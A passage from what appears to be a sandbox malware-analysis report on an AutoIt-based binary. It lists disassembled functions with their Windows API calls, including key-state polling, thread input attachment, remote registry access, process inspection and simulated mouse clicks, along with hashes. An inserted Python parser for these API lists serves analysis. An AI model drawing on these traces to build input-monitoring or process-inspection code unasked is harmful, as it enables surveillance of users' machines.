                                                                                                                                          • Part of subcall function 00577B1D: VariantInit.OLEAUT32(00000000), ref: 00577B5D
                                                                                                                                          • Part of subcall function 00577B1D: VariantCopy.OLEAUT32(00000000,?), ref: 00577B66
                                                                                                                                          • Part of subcall function 00577B1D: VariantClear.OLEAUT32(00000000), ref: 00577B72
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                        • API String ID: 4237274167-1221869570
                                                                                                                                        • Opcode ID: d46de942f83c17339ddbaa78049e5b4c7caf8d399c4072103da826391a73deab
                                                                                                                                        • Instruction ID: 6726e3ab939969fb9c96783bf72d87b907d0ba00a95911ed15da8312d5d20e36
                                                                                                                                        • Opcode Fuzzy Hash: d46de942f83c17339ddbaa78049e5b4c7caf8d399c4072103da826391a73deab
                                                                                                                                        • Instruction Fuzzy Hash: 53916C746043029FC710EF24C48596ABBE5FFD9314F14896EF88A9B3A1DB31E945CB92
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0052436A: _wcscpy.LIBCMT ref: 0052438D
                                                                                                                                        • _memset.LIBCMT ref: 0057332E
                                                                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0057335D
                                                                                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00573410
                                                                                                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0057343E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 4152858687-4108050209
                                                                                                                                        • Opcode ID: d32cd2f78d07f59cc9c3bd8e17a9c7faa3bc8108b21600a5940e9700591cd18f
                                                                                                                                        • Instruction ID: 53b0c2e2e25b8577a73288f49f43e0d9d405943eb5f95ca211b5919239696bf8
                                                                                                                                        • Opcode Fuzzy Hash: d32cd2f78d07f59cc9c3bd8e17a9c7faa3bc8108b21600a5940e9700591cd18f
                                                                                                                                        • Instruction Fuzzy Hash: 3851C2316083119BDB299E28E84966BBFE4BF95330F04892EF899D31D1DB20CE44F756
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 00572F67
                                                                                                                                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00572F83
                                                                                                                                        • DeleteMenu.USER32(?,00000007,00000000), ref: 00572FC9
                                                                                                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,005D7890,00000000), ref: 00573012
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Menu$Delete$InfoItem_memset
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 1173514356-4108050209
                                                                                                                                        • Opcode ID: 6266eaac2bf3b03c23b2a34b4b8862f9851bc3278328d5a40e8d6b72d8c06b0b
                                                                                                                                        • Instruction ID: db5190bc25f040978ddb9be6d34f42df91c41ddf99ef1fb9dc9ee00f9b2e08dd
                                                                                                                                        • Opcode Fuzzy Hash: 6266eaac2bf3b03c23b2a34b4b8862f9851bc3278328d5a40e8d6b72d8c06b0b
                                                                                                                                        • Instruction Fuzzy Hash: 0441D6712083429FD720DF25E849B1ABFE4BF85320F108A1DF569972D1DB70EA05EB52
APIs
  • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
  • Part of subcall function 0056B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0056B7BD
• SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00569ACC
• SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00569ADF
• SendMessageW.USER32(?,00000189,?,00000000), ref: 00569B0F
  • Part of subcall function 00521821: _memmove.LIBCMT ref: 0052185B
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: MessageSend$_memmove$ClassName
• String ID: ComboBox$ListBox
• API String ID: 365058703-1403004172
• Opcode ID: 6a098ad644fe4e7076f74c8f1dbf83d3c5fa842953ee2aef6afc408a7ece0d98
• Instruction ID: e1f1ab84c3d923c5c3599203e4606d8420a239c73d065af24dc29909d484d5fb
• Opcode Fuzzy Hash: 6a098ad644fe4e7076f74c8f1dbf83d3c5fa842953ee2aef6afc408a7ece0d98
• Instruction Fuzzy Hash: E121E171904104AEDB14ABA4EC8ADFFBFACFF92360F144119F825A72E1DB344D099660
APIs
  • Part of subcall function 00512111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0051214F
  • Part of subcall function 00512111: GetStockObject.GDI32(00000011), ref: 00512163
  • Part of subcall function 00512111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0051216D
• SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00596A86
• LoadLibraryW.KERNEL32(?), ref: 00596A8D
• SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00596AA2
• DestroyWindow.USER32(?), ref: 00596AAA
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
• String ID: SysAnimate32
• API String ID: 4146253029-1011021900
• Opcode ID: 0577d1613db7126967c71847b0337e51a0f34de33eabc4bd82d37214c1fbbb4a
• Instruction ID: 5e98e145b6029209219a300b01d73692b9f2ab82d5a7b57d2ac1267b9aa46d2d
• Opcode Fuzzy Hash: 0577d1613db7126967c71847b0337e51a0f34de33eabc4bd82d37214c1fbbb4a
• Instruction Fuzzy Hash: 6A219A71200205EFEF108FB4DC80EBB7BADFB59368F109619FA50A2190D331DC99A760
APIs
• GetStdHandle.KERNEL32(0000000C), ref: 00577377
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 005773AA
• GetStdHandle.KERNEL32(0000000C), ref: 005773BC
• CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 005773F6
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: CreateHandle$FilePipe
• String ID: nul
• API String ID: 4209266947-2873401336
• Opcode ID: 641964a8ad06ab8c4b022b80998538698fe1a24edc73f0ab4948f2659357f537
• Instruction ID: 9c00fb569af4b6b74d8b1f20542c95ff835283d0daaeecdaaed21dce5cc4c401
• Opcode Fuzzy Hash: 641964a8ad06ab8c4b022b80998538698fe1a24edc73f0ab4948f2659357f537
• Instruction Fuzzy Hash: C321607450830A9BDB208F64FC49A9A7FA4BF59720F208E19FCA4D72D0D770D950EB60
APIs
• GetStdHandle.KERNEL32(000000F6), ref: 00577444
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00577476
• GetStdHandle.KERNEL32(000000F6), ref: 00577487
• CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 005774C1
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: CreateHandle$FilePipe
• String ID: nul
• API String ID: 4209266947-2873401336
• Opcode ID: 2410969c2dd194c14b571031398527b5920c00e087777b0c8952eff33a892bf9
• Instruction ID: 80226a30765ef722628e01c6693020666b7178bb53ab52ebaf0f399fbaab0d7c
• Opcode Fuzzy Hash: 2410969c2dd194c14b571031398527b5920c00e087777b0c8952eff33a892bf9
• Instruction Fuzzy Hash: 9121B23560830A9BDF209F69BC48E997FA9BF59730F208A19F9A4D72D0D7709844EB50
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0057B297
• GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0057B2EB
• __swprintf.LIBCMT ref: 0057B304
• SetErrorMode.KERNEL32(00000000,00000001,00000000,005A0980), ref: 0057B342
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: ErrorMode$InformationVolume__swprintf
• String ID: %lu
• API String ID: 3164766367-685833217
• Opcode ID: cf28ce12262f66e74f552119b3621b9ec6d2f81d3150471b3c216853f862e772
• Instruction ID: 40dc4325537a48bb85c4941fc8e8f1a097234829d99208aba5ed6a43d40171d4
• Opcode Fuzzy Hash: cf28ce12262f66e74f552119b3621b9ec6d2f81d3150471b3c216853f862e772
• Instruction Fuzzy Hash: 9B216235A00209AFDB10DFA4D849EAEBBB8FF89714F104069F509D7351DB31EA45DB61
APIs
  • Part of subcall function 00521821: _memmove.LIBCMT ref: 0052185B
  • Part of subcall function 0056AA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0056AA6F
  • Part of subcall function 0056AA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 0056AA82
  • Part of subcall function 0056AA52: GetCurrentThreadId.KERNEL32 ref: 0056AA89
  • Part of subcall function 0056AA52: AttachThreadInput.USER32(00000000), ref: 0056AA90
• GetFocus.USER32 ref: 0056AC2A
  • Part of subcall function 0056AA9B: GetParent.USER32(?), ref: 0056AAA9
• GetClassNameW.USER32(?,?,00000100), ref: 0056AC73
• EnumChildWindows.USER32(?,0056ACEB), ref: 0056AC9B
• __swprintf.LIBCMT ref: 0056ACB5
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
• String ID: %s%d
• API String ID: 1941087503-1110647743
• Opcode ID: f4c8e5a58a1dd0d9c43645edb7b6d4ebe88e6222687e253b19b2b446561deb8b
• Instruction ID: 74518f686b7f1b25e9d7fac4d2bd8e0b4d578b86d28390203cfbb82a0cfa18b3
• Opcode Fuzzy Hash: f4c8e5a58a1dd0d9c43645edb7b6d4ebe88e6222687e253b19b2b446561deb8b
• Instruction Fuzzy Hash: 8111C074600206ABDF11BFA0DD8AFAA7B6CBF95300F004065BA08AB182CA715949DB75
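The per-function API lists in these records are plain text, and the fastest way to compare them across samples or to flag a behaviour is to parse them rather than read them. The Python below is an added example written for this page, not code from Joe Sandbox or from its report format documentation; it assumes only the line shape visible in the records here ("Name.Module(args), ref: address", optionally prefixed with "Part of subcall function XXXXXXXX:"), and its sample input is constructed from lines in this section. It decodes the CreateFileW arguments with the standard Win32 constants and flags the GetStdHandle / CreatePipe / CreateFileW("nul") combination that two of the records above share, which is the shape of redirecting a child's standard streams to a pipe or to the null device.

```python
import re
from collections import Counter

# Constructed sample: "APIs" sub-lists in the exact line shape this report uses,
# assembled from lines in this section (two records; a subcall line and a
# parenthesis-free libc entry are mixed into the second to exercise those forms).
SAMPLE = """\
APIs
• GetStdHandle.KERNEL32(0000000C), ref: 00577377
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 005773AA
• GetStdHandle.KERNEL32(0000000C), ref: 005773BC
• CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 005773F6
Strings
APIs
  • Part of subcall function 00512111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0051214F
  • Part of subcall function 00521821: _memmove.LIBCMT ref: 0052185B
• SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00596A86
• LoadLibraryW.KERNEL32(?), ref: 00596A8D
• DestroyWindow.USER32(?), ref: 00596AAA
Strings
"""

# One call line: optional "Part of subcall function XXXXXXXX:" prefix,
# Name.Module, optional "(args)", then "ref: address". Inferred from the page.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)


def parse_api_blocks(text):
    """Return one list of call dicts per 'APIs' header; a 'Strings' header closes it."""
    blocks, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = []
            blocks.append(current)
            continue
        if line == "Strings":
            current = None
            continue
        m = API_RE.match(line) if current is not None else None
        if not m:
            continue
        args = m.group("args")
        current.append({
            "api": m.group("api"),
            "module": m.group("mod"),
            "args": [a.strip() for a in args.split(",")] if args else [],
            "ref": m.group("ref"),
            "subcall": m.group("sub"),  # None when this function makes the call itself
        })
    return blocks


def sequence(block, include_subcalls=False):
    """Ordered 'Api.Module' names; subcall lines are dropped unless asked for."""
    return [f"{c['api']}.{c['module']}" for c in block
            if include_subcalls or c["subcall"] is None]


def _flags(value, table):
    """Name the bits of a hex argument; an unknown '?' argument is passed through."""
    try:
        n = int(value, 16)
    except ValueError:
        return [value]
    names = [name for bit, name in table if n & bit]
    return names if names or n == 0 else [hex(n)]


# Standard Win32 constants for CreateFileW (dwDesiredAccess, dwShareMode, dwCreationDisposition)
ACCESS = [(0x80000000, "GENERIC_READ"), (0x40000000, "GENERIC_WRITE"),
          (0x20000000, "GENERIC_EXECUTE"), (0x10000000, "GENERIC_ALL")]
SHARE = [(0x1, "FILE_SHARE_READ"), (0x2, "FILE_SHARE_WRITE"), (0x4, "FILE_SHARE_DELETE")]
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}


def describe_createfile(call):
    """Decode a CreateFileW call; argument order follows the Win32 prototype."""
    a = call["args"]
    assert call["api"] == "CreateFileW" and len(a) == 7
    try:
        disp = DISPOSITION.get(int(a[4], 16), a[4])
    except ValueError:
        disp = a[4]
    return {"path": a[0], "access": _flags(a[1], ACCESS),
            "share": _flags(a[2], SHARE), "disposition": disp}


def redirects_stdio_to_nul(block):
    """True when a function opens the 'nul' device next to GetStdHandle/CreatePipe:
    the standard-stream redirection pattern that appears in two records of this report."""
    direct = [c for c in block if c["subcall"] is None]
    opens_nul = any(c["api"] == "CreateFileW" and c["args"][:1] == ["nul"] for c in direct)
    touches_std = any(c["api"] in ("GetStdHandle", "CreatePipe") for c in direct)
    return opens_nul and touches_std


def api_histogram(blocks):
    """Count direct API names across all records for a quick view of what the binary leans on."""
    return Counter(name for b in blocks for name in sequence(b))


if __name__ == "__main__":
    for i, block in enumerate(parse_api_blocks(SAMPLE)):
        print(i, " -> ".join(sequence(block)), "stdio->nul:", redirects_stdio_to_nul(block))
```

Feeding a whole report export to parse_api_blocks yields one list per function record, so the same sequence() output can be diffed against another sample's records, and api_histogram() gives a first-pass summary before looking at individual hashes.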
APIs
• CharUpperBuffW.USER32(?,?), ref: 00572318
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: BuffCharUpper
• String ID: APPEND$EXISTS$KEYS$REMOVE
• API String ID: 3964851224-769500911
APIs
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0058F2F0
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 0058F320
• GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0058F453
• CloseHandle.KERNEL32(?), ref: 0058F4D4
Similarity
• API ID: Process$CloseCountersHandleInfoMemoryOpen
• String ID:
• API String ID: 2364364464-0
APIs
  • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
  • Part of subcall function 0059147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0059040D,?,?), ref: 00591491
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0059075D
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0059079C
• RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 005907E3
• RegCloseKey.ADVAPI32(?,?), ref: 0059080F
• RegCloseKey.ADVAPI32(00000000), ref: 0059081C
Similarity
• API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
• String ID:
• API String ID: 3440857362-0
APIs
• GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0057EC62
• GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0057EC8B
• WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0057ECCA
  • Part of subcall function 00514D37: __itow.LIBCMT ref: 00514D62
  • Part of subcall function 00514D37: __swprintf.LIBCMT ref: 00514DAC
• WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0057ECEF
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0057ECF7
Similarity
• API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
• String ID:
• API String ID: 1389676194-0
APIs
• GetCursorPos.USER32(?), ref: 00512727
• ScreenToClient.USER32(005D77B0,?), ref: 00512744
• GetAsyncKeyState.USER32(00000001), ref: 00512769
• GetAsyncKeyState.USER32(00000002), ref: 00512777
Similarity
• API ID: AsyncState$ClientCursorScreen
• String ID:
• API String ID: 4210589936-0
APIs
• GetWindowRect.USER32(?,?), ref: 005695E8
• PostMessageW.USER32(?,00000201,00000001), ref: 00569692
• Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0056969A
• PostMessageW.USER32(?,00000202,00000000), ref: 005696A8
• Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 005696B0
Similarity
• API ID: MessagePostSleep$RectWindow
• String ID:
• API String ID: 3382505437-0
APIs
• IsWindowVisible.USER32(?), ref: 0056BD9D
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0056BDBA
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0056BDF2
• CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0056BE18
• _wcsstr.LIBCMT ref: 0056BE22
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3902887630-0
                                                                                                                                        • Opcode ID: d94ab24a802a1ca80e06364a4e9ad03736f85caa77412d3f0e41e7718677f6ba
                                                                                                                                        • Instruction ID: b427f6f8685ec01be850a1fc3de5fe7c5e8fc4bd031c2d08b682ef129f2cbd14
                                                                                                                                        • Opcode Fuzzy Hash: d94ab24a802a1ca80e06364a4e9ad03736f85caa77412d3f0e41e7718677f6ba
                                                                                                                                        • Instruction Fuzzy Hash: 1F212632208204BBFB255B359C0DEBB7FACFF85760F104029F909CB191EB62DC9092A0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 005129E2: GetWindowLongW.USER32(?,000000EB), ref: 005129F3
                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0059B804
                                                                                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0059B829
                                                                                                                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0059B841
                                                                                                                                        • GetSystemMetrics.USER32(00000004), ref: 0059B86A
                                                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,0058155C,00000000), ref: 0059B888
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Long$MetricsSystem
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2294984445-0
                                                                                                                                        • Opcode ID: 2a812972fd5a456b156faab9e5aad80289823fe3b26003d2420a69f72996b2dd
                                                                                                                                        • Instruction ID: 098f7790ab5053d4b1807d2615d4a7b01f61d7e0de7a24516f7339916dcf4d77
                                                                                                                                        • Opcode Fuzzy Hash: 2a812972fd5a456b156faab9e5aad80289823fe3b26003d2420a69f72996b2dd
                                                                                                                                        • Instruction Fuzzy Hash: E721A331914215AFEF249F38AD08B6A3FA9FB59724F144B39F925D31E0E7309850DB90
                                                                                                                                        APIs
                                                                                                                                        • IsWindow.USER32(00000000), ref: 00586159
                                                                                                                                        • GetForegroundWindow.USER32 ref: 00586170
                                                                                                                                        • GetDC.USER32(00000000), ref: 005861AC
                                                                                                                                        • GetPixel.GDI32(00000000,?,00000003), ref: 005861B8
                                                                                                                                        • ReleaseDC.USER32(00000000,00000003), ref: 005861F3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$ForegroundPixelRelease
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4156661090-0
                                                                                                                                        • Opcode ID: 0cf1d8c7f7d1d835da8fab13097c27f82abf61da7f0385f875f3851f55f2cf8e
                                                                                                                                        • Instruction ID: 6d4700fe1d5ded752cbe9f23dd61f140a61c0f508e20c02a61cbd16e90e80b1f
                                                                                                                                        • Opcode Fuzzy Hash: 0cf1d8c7f7d1d835da8fab13097c27f82abf61da7f0385f875f3851f55f2cf8e
                                                                                                                                        • Instruction Fuzzy Hash: 3B21C375A00604EFD700EF65DD8CAAABBF9FF99310F048469F94A97352CA30AC44DB90
                                                                                                                                        APIs
